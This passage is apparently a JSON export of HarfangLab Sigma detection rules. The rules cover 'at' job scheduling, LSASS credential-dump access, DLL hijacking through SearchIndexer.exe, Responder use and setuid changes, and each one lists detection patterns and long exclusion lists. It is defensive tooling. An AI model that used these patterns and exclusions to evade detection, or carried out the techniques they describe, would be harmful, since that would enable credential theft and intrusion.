"b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.612386Z", "creation_date": "2026-03-23T11:45:34.612389Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.612397Z", "rule_level": "medium", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md#atomic-test-2---at---schedule-a-job", "https://attack.mitre.org/techniques/T1053/002/" ], "name": "t1053_002_scheduled_job_at.yml", "content": "title: Job Creation Scheduled via at\nid: 051bcdc2-56be-49af-bd6f-1fbac403ab5b\ndescription: |\n Detects a scheduled job creation using the 'at' utility.\n Contrary to the 'crontab' command which schedules repetitive commands, the 'at' command schedules tasks that execute once.\n The new job can be found in the /var/spool/cron/atjobs directory.\n Adversaries may abuse the 'at' utility to perform task scheduling for initial or recurring execution of malicious code.\n It is recommended to investigate the process using the utility as well as the scheduled job itself to look for malicious content or actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md#atomic-test-2---at---schedule-a-job\n - https://attack.mitre.org/techniques/T1053/002/\ndate: 2022/12/26\nmodified: 2025/07/29\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.At\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/at'\n - '/batch'\n\n exclusion_not_create:\n CommandLine|contains:\n - ' -l' # lists the user's pending jobs\n - ' -r' # deletes jobs\n - ' -d' # deletes jobs\n\n exclusion_now:\n CommandLine: 'at now'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "051bcdc2-56be-49af-bd6f-1fbac403ab5b", "rule_name": "Job Creation Scheduled via at", "rule_description": "Detects a scheduled job creation using the 'at' utility.\nContrary to the 'crontab' command which schedules repetitive commands, the 'at' command schedules tasks that execute once.\nThe new job can be found in the /var/spool/cron/atjobs directory.\nAdversaries may abuse the 'at' utility to perform task scheduling for initial or recurring execution of malicious code.\nIt is recommended to investigate the process using the utility as well as the scheduled job itself to look for malicious content or actions.\n", "rule_creation_date": "2022-12-26", "rule_modified_date": "2025-07-29", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.execution", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1053.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "053fc596-ebe0-4ab6-9d82-691fec399375", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:35.295481Z", "creation_date": "2026-03-23T11:45:35.295485Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:35.295491Z", "rule_level": "medium", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/shadowpad-new-activity-from-the-winnti-group/", "https://attack.mitre.org/techniques/T1003/001/" ], "name": "t1003_001_cleared_process_info_open_lsass.yml", "content": "title: LSASS Accessed by Process Without PE Metadata Information\nid: 053fc596-ebe0-4ab6-9d82-691fec399375\ndescription: |\n Detects the suspicious open of lsass.exe by a process without PE metadata information (original name and internal name).\n This can be indicative of an attempt to dump LSASS' memory for privilege escalation purposes.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n It is recommended to analyze the source process for malicious content, to check its legitimacy and origin and to start memory forensics to determine stolen credentials.\nreferences:\n - https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/shadowpad-new-activity-from-the-winnti-group/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/06/07\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: \"PROCESS_VM_READ\"\n ProcessOriginalFileName: ''\n ProcessInternalName: ''\n ProcessLegalCopyright: '' # too many FP with only OriginalFileame and InternalName not set. Generally, LegalCopyright and/or CompanyName is set\n ProcessImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n\n exclusion_no_info:\n # In case the agent doesn't know the process info.\n ProcessImphash: '00000000000000000000000000000000'\n\n # Lot of softwares (including Microsoft owns one) do read the image path off the PEB. (inside _RTL_USER_PROCESS_PARAMETERS)\n # This is usually to grab the proces list.\n exclusion_signed_peb_read:\n ProcessSigned: 'true'\n GrantedAccess:\n - '0x1010'\n - '0x1410'\n exclusion_waptpython:\n # WAPT is an open source management tool in python that is unsigned.\n CallTrace|contains: 'python27.dll'\n ProcessProcessName: 'waptpython.exe'\n GrantedAccess: '0x1410'\n exclusion_trendmicro:\n # Trend Micro have a lot of different apps.\n ProcessSignature: 'Trend Micro, Inc.'\n exclusion_synology:\n # Some of their software use an have expired certificate.\n #CallTrace|contains: 'UsbClientService.exe'\n #ProcessProcessName: 'UsbClientService.exe'\n # seen versions from 2011 without signature or any internal name, and no usbclientservice.exe occurences in the callstack\n ProcessImage: '?:\\Program Files (x86)\\Synology\\Assistant\\UsbClientService.exe'\n #ProcessSignature: 'Synology Inc.'\n GrantedAccess: '0x1410'\n exclusion_dell_sre:\n CallTrace|contains: 'ProcBy.dll'\n ProcessProcessName: 'SRE.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Sutherland Global Services Inc'\n - 'Sutherland Global Services Private Limited'\n GrantedAccess:\n - '0x1fffff'\n - '0x12f4d0'\n exclusion_g:\n CallTrace|contains: 'nfapi.dll'\n ProcessProcessName: 'DnsCloudClientHost64.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'G DATA Software AG'\n - 'G DATA CyberDefense AG'\n GrantedAccess: '0x1f3fff'\n exclusion_conexant_universal_device_install_uninstall:\n CallTrace|contains: 'KUIU.EXE'\n ProcessProcessName: 'KUIU.EXE'\n ProcessSigned: 'true'\n ProcessSignature: 'Conexant Systems, Inc.'\n GrantedAccess: '0x12f4d0'\n exclusion_rsa_net_witness:\n CallTrace|contains: 'NWEAgent.exe'\n ProcessProcessName: 'NWEAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'RSA Security LLC'\n GrantedAccess: '0x1fffff'\n exclusion_adobe_arm:\n ProcessProcessName: 'AdobeARMHelper.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Adobe Systems, Incorporated'\n - 'Adobe Inc.'\n exclusion_alibaba_uninstaller:\n ProcessImage|endswith: '\\Uninstall.exe'\n ProcessSignature: 'Alibaba (China) Network Technology Co.,Ltd.'\n GrantedAccess: '0x12f4d0'\n exclusion_iobit_setup:\n ProcessSignature: 'IObit CO., LTD'\n ProcessDescription: 'Setup/Uninstall'\n GrantedAccess: '0x12f4d0'\n exclusion_oxalys_tools:\n ProcessImage|endswith:\n - '\\OXATOOLS.exe'\n - '\\oxatools64.exe'\n ProcessCompany:\n - 'Oxalys Technologies'\n - 'Oxalys'\n ProcessDescription:\n - 'OXATOOLS'\n - 'Oxatools 64'\n ProcessProduct:\n - 'OXATOOLS'\n - 'OXATOOLS64'\n GrantedAccess: '0x1410'\n exclusion_ossec:\n CallTrace|contains|all:\n - 'ossec-agent'\n - 'ossec-agent.exe'\n ProcessProcessName: 'ossec-agent.exe'\n GrantedAccess: '0x1fffff'\n exclusion_wazuh:\n - ProcessImage: '?:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe'\n - ProcessProcessName: 'ossec-agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Wazuh, Inc'\n exclusion_mcafee:\n ProcessProcessName:\n - 'mfeesp.exe'\n - 'mcshield.exe'\n - 'mfefw.exe'\n - 'mfetp.exe'\n - 'VsTskMgr.exe'\n - 'Scan64.exe'\n - 'shstat.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'McAfee, Inc.'\n exclusion_ocssetup:\n ProcessProcessName: 'OcsSetup.exe'\n ProcessDescription: 'OCS Inventory NG Agent'\n exclusion_cyland_pos_service:\n ProcessProcessName: 'PosService.exe'\n ProcessCompany: 'Cylande'\n GrantedAccess: '0x1410'\n exclusion_seiko_epson_escsvc64:\n ProcessProcessName: 'escsvc64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SEIKO EPSON CORPORATION'\n GrantedAccess: '0x101410'\n exclusion_google_update:\n # for instance, ..C:\\Program Files (x86)\\Google\\Temp\\GUM8660.tmp\\goopdate.dll+16b4e..\n # to handle chrome installed in user appdata, match only on google\\temp\n GrantedAccess: '0x1410'\n CallTrace: '*\\Google\\Temp\\GUM????.tmp\\goopdate.dll*'\n exclusion_adobe:\n # C:\\Program Files (x86)\\Adobe\\Adobe Sync\\CoreSync\\customhook\\CoreSyncCustomHook.exe\n # C:\\Program Files (x86)\\Common Files\\Adobe\\CoreSyncExtension\\customhook\\CoreSyncCustomHook.exe\n ProcessImage:\n - '?:\\Program Files (x86)\\Adobe\\Adobe Sync\\CoreSync\\\\*'\n - '?:\\Program Files (x86)\\Common Files\\Adobe\\CoreSyncExtension\\\\*'\n\n exclusion_battleeye:\n ProcessImage: '?:\\Program Files (x86)\\Common Files\\BattlEye\\BEService.exe'\n\n exclusion_symantec:\n ProcessImage: '?:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\bin\\SysUtil.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n\n exclusion_windev_32bits:\n GrantedAccess: '0x1410'\n CallTrace|contains|all:\n # WinDev 26 standard library\n - 'wd260std.DLL'\n # WinDev 26 VM\n - 'wd260vm.DLL'\n\n exclusion_windev_64bits:\n GrantedAccess: '0x1410'\n CallTrace|contains|all:\n # WinDev 26 standard library\n - 'wd260std64.DLL'\n # WinDev 26 VM\n - 'wd260vm64.DLL'\n\n exclusion_easeus:\n ProcessImage:\n - '?:\\Program Files (x86)\\EaseUS\\Todo Backup\\bin\\TodoBackupService.exe'\n - '?:\\Program Files (x86)\\EaseUS\\ENS\\ensserver.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'CHENGDU YIWO Tech Development Co., Ltd.'\n\n exclusion_watchguard:\n ProcessImage: '?:\\Program Files (x86)\\WatchGuard\\WatchGuard Mobile VPN with SSL\\wgsslvpnsrc.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\WatchGuard\\WatchGuard Mobile VPN with SSL\\wgsslvpnsrc.exe'\n\n exclusion_writedescexecutefilename:\n # C:\\Windows\\Temp\\{368361DA-CBF9-4A07-90CB-2CFF91E36DCC}\\WriteDescExecuteFileName.exe\n ProcessImage: '*\\WriteDescExecuteFileName.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Samsung Electronics CO., LTD.'\n GrantedAccess: '0x153b'\n\n exclusion_xerox:\n ProcessImage: '?:\\Xerox\\Docushare\\IDOLServer\\IDOL\\AutonomyIDOLServer.exe'\n CallTrace|contains: '|?:\\Xerox\\Docushare\\IDOLServer\\IDOL\\AutonomyIDOLServer.exe+'\n GrantedAccess: '0x1410'\n\n exclusion_metricbeat:\n ProcessImage: '?:\\Program Files\\Metricbeat\\metricbeat.exe'\n ProcessCompany: ''\n ProcessDescription: ''\n ProcessProduct: ''\n CallTrace|contains: '|?:\\Program Files\\Metricbeat\\metricbeat.exe+?????'\n GrantedAccess: '0x1010'\n\n exclusion_zabbix:\n ProcessImage|endswith: '\\zabbix_agentd.exe'\n CallTrace|endswith:\n - '\\zabbix_agentd.exe+?????|?:\\Windows\\System32\\kernel32.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????'\n - '\\zabbix_agentd.exe+?????|?:\\Windows\\System32\\kernel32.dll+????|?:\\Windows\\System32\\ntdll.dll+?????'\n - '\\zabbix_agentd.exe+?????'\n GrantedAccess: '0x1410'\n\n exclusion_oracle_rman:\n ProcessImage|endswith: '\\app\\product\\\\*\\dbhome\\bin\\rman.exe'\n\n exclusion_oracle_dll:\n GrantedAccess: '0x1410'\n # d:\\oracle\\product\\12.2.0\\client_1\\bin\\orannzsbb12.dll\n # E:\\oracle\\product\\12.2.0\\cl32\\bin\\orannzsbb12.dll+\n # E:\\Oracle_client19\\product\\19.0.0\\client_1\\bin\\orannzsbb19.dll\n CallTrace|contains:\n - '\\bin\\orannzsbb??.dll'\n - '\\bin\\oracrf??.dll'\n - '\\bin\\oracore??.dll'\n\n exclusion_xampp:\n # C:\\xampp\\xampp-control.exe\n # no PE metadata information so we must use the SHA256\n ProcessSha256: '1400812815452aa93ab1e051b11f8062ace7bc95e50a91cc3479ba64ed847dde'\n\n exclusion_manageengine:\n ProcessImage: '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\appctrl\\bin\\VerifyTrustedFiles.exe'\n\n exclusion_nagios:\n ProcessImage: '?:\\Program Files (x86)\\Nagios\\NCPA\\ncpa_passive.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\Nagios\\NCPA\\python27.dll+'\n\n exclusion_hewlett_packard:\n ProcessImage: '?:\\Program Files (x86)\\Hewlett-Packard\\Library and Tape Tools WebGUI\\bin\\DeviceAnalysisService.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\Hewlett-Packard\\Library and Tape Tools WebGUI\\bin\\DeviceAnalysisService.exe+'\n\n exclusion_streaming_runtime:\n ProcessImage: '?:\\Program Files\\Streaming Runtime Service\\pxr_srs_launcher.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\Hewlett-Packard\\Library and Tape Tools WebGUI\\bin\\DeviceAnalysisService.exe+'\n GrantedAccess: '0x1fffff'\n ProcessSigned: 'true'\n ProcessSignature: 'Qingdao Pico Technology Co.,Ltd.'\n\n exclusion_watchguard_2:\n ProcessImage: '?:\\WatchGuard\\wgsslvpnsrc.exe'\n CallTrace|contains: '|?:\\WatchGuard\\wgsslvpnsrc.exe+'\n GrantedAccess: '0x1f3fff'\n ProcessSigned: 'true'\n ProcessSignature: 'WatchGuard Technologies'\n\n exclusion_moneweb:\n ProcessImage|endswith: '\\Moneweb\\GoldenGatesrvmweb_??\\mgr.exe'\n CallTrace|contains: '\\Moneweb\\GoldenGatesrvmweb_??\\mgr.exe+'\n GrantedAccess: '0x1410'\n\n exclusion_equitrac:\n ProcessImage: '?:\\Program Files\\Equitrac\\Shared Services\\Caching\\bin\\sigar_port.exe'\n CallTrace|contains: '?:\\Program Files\\Equitrac\\Shared Services\\Caching\\bin\\sigar.dll'\n\n exclusion_mactype:\n ProcessImage: '?:\\program files\\mactype\\mt64agnt.exe'\n\n exclusion_svc_mgr_alcatel:\n ProcessImage: '?:\\8770\\bin\\svc_mgr.exe'\n\n exclusion_kill_ciril:\n ProcessImage|endswith:\n - '\\ciril\\prod\\util_unix\\kill.exe'\n - '\\ciril\\prod\\util_unix\\pskill.exe'\n - '\\ciril\\prod\\utilitaires\\expl\\kill_processus.exe'\n - '\\ciril\\net\\cgi-bin\\document.exe'\n - '\\ciril\\net\\cgi-bin\\irename.exe'\n - '\\ciril\\net\\cgi-bin\\lirepjfaccpp.exe'\n\n exclusion_hardis_saas:\n ProcessImage: '?:\\hardis\\saas-mgr\\saas-mgr.exe'\n ProcessGrandparentImage: '?:\\Windows\\system32\\services.exe'\n\n exclusion_appdynamics:\n ProcessImage: '?:\\ProgramData\\AppDynamics\\agents\\machineagent\\bin\\MachineAgentService.exe'\n ProcessGrandparentImage: '?:\\Windows\\system32\\services.exe'\n\n exclusion_rufus:\n ProcessProcessName: 'rufus-?.?.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Akeo Consulting'\n GrantedAccess: '0x1450'\n\n exclusion_nokia_vitalsuite:\n ProcessImage|endswith:\n - '\\VSCommon\\Program\\vnStatusKill.exe'\n - '\\VitalNet\\Program\\aggrun.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "053fc596-ebe0-4ab6-9d82-691fec399375", "rule_name": "LSASS Accessed by Process Without PE Metadata Information", "rule_description": "Detects the suspicious open of lsass.exe by a process without PE metadata information (original name and internal name).\nThis can be indicative of an attempt to dump LSASS' memory for privilege escalation purposes.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nIt is recommended to analyze the source process for malicious content, to check its legitimacy and origin and to start memory forensics to determine stolen credentials.\n", "rule_creation_date": "2021-06-07", "rule_modified_date": "2026-02-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access" ], "rule_technique_tags": [ "attack.t1003.001", "attack.t1078" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0551aa79-1306-43bb-9b6d-df4f7837d107", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.596475Z", "creation_date": "2026-03-23T11:45:34.596485Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.596500Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://x.com/dez_/status/1790807116363481415", "https://securelist.com/cve-2024-30051/112618/", "https://attack.mitre.org/techniques/T1068/" ], "name": "t1068_dwm_launch_process.yml", "content": "title: Suspicious Child Process Launched by DWM.exe\nid: 0551aa79-1306-43bb-9b6d-df4f7837d107\ndescription: |\n Detects a suspicious process launched by dwm.exe.\n Adversaries have been observed exploiting vulnerabilities in DWM in order to escalate privileges. As result of a successful exploitation, the DWM.exe process launch a child process with System privileges.\n It is recommended to check actions made by the newly created process for suspicious activity.\nreferences:\n - https://x.com/dez_/status/1790807116363481415\n - https://securelist.com/cve-2024-30051/112618/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2024/07/23\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2024-30051\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\dwm.exe'\n\n filter_known_children:\n Image:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\ISM.exe'\n - '?:\\Windows\\System32\\dwm.exe'\n - '?:\\Windows\\System32\\dgcvideo.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0551aa79-1306-43bb-9b6d-df4f7837d107", "rule_name": "Suspicious Child Process Launched by DWM.exe", "rule_description": "Detects a suspicious process launched by dwm.exe.\nAdversaries have been observed exploiting vulnerabilities in DWM in order to escalate privileges. As result of a successful exploitation, the DWM.exe process launch a child process with System privileges.\nIt is recommended to check actions made by the newly created process for suspicious activity.\n", "rule_creation_date": "2024-07-23", "rule_modified_date": "2025-04-08", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1068" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "05797331-a902-41f3-8dd3-3e0f5cc17d73", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.595136Z", "creation_date": "2026-03-23T11:45:34.595139Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.595147Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/", "https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_searchindexer.yml", "content": "title: DLL Hijacking via SearchIndexer.exe\nid: 05797331-a902-41f3-8dd3-3e0f5cc17d73\ndescription: |\n Detects potential Windows DLL Hijacking via SearchIndexer.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/\n - https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SearchIndexer.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\msftedit.dll'\n - '\\mstracer.dll'\n - '\\msfte.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "05797331-a902-41f3-8dd3-3e0f5cc17d73", "rule_name": "DLL Hijacking via SearchIndexer.exe", "rule_description": "Detects potential Windows DLL Hijacking via SearchIndexer.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "058378a0-6b19-4ce5-86a4-9bd8a453e8ad", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.619415Z", "creation_date": "2026-03-23T11:45:34.619416Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.619421Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/SpiderLabs/Responder", "https://github.com/lgandx/Responder", "https://attack.mitre.org/software/S0174/" ], "name": "t1557_001_responder_usage.yml", "content": "title: Responder Executed\nid: 058378a0-6b19-4ce5-86a4-9bd8a453e8ad\ndescription: |\n Detects Responder, an open source tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.\n Attackers can use this tool for credential access, privilege escalation and lateral movement.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://github.com/SpiderLabs/Responder\n - https://github.com/lgandx/Responder\n - https://attack.mitre.org/software/S0174/\ndate: 2024/09/26\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.collection\n - attack.t1557.001\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.HackTool.Responder\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine: 'sh -c */certs/gen-self-signed-cert.sh >/dev/null 2>&1'\n\n condition: selection\nlevel: critical\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "058378a0-6b19-4ce5-86a4-9bd8a453e8ad", "rule_name": "Responder Executed", "rule_description": "Detects Responder, an open source tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.\nAttackers can use this tool for credential access, privilege escalation and lateral movement.\nIt is recommended to verify if the usage of this tool is legitimate.\n", "rule_creation_date": "2024-09-26", "rule_modified_date": "2025-02-05", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.collection", "attack.credential_access", "attack.discovery" ], "rule_technique_tags": [ "attack.t1040", "attack.t1557.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "058b2e5d-6e8a-4289-bfb7-96a9cc306c0f", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-24T07:14:08.594725Z", "creation_date": "2026-03-23T11:45:34.623356Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.623360Z", "rule_level": "high", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md", "https://attack.mitre.org/techniques/T1548/001/" ], "name": "t1548_001_chmod_setuid_linux.yml", "content": "title: SetUID Access Flag Set via chmod/setcap\nid: 058b2e5d-6e8a-4289-bfb7-96a9cc306c0f\ndescription: |\n Detects when chmod or setcap are used to set the SetUID bit or capability on a file.\n This could be used by an attacker to execute a file with a different (and potentially more privileged) user context.\n It is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md\n - https://attack.mitre.org/techniques/T1548/001/\ndate: 2022/09/26\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.001\n - attack.t1222.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Chmod\n - classification.Linux.Behavior.ConfigChange\n - 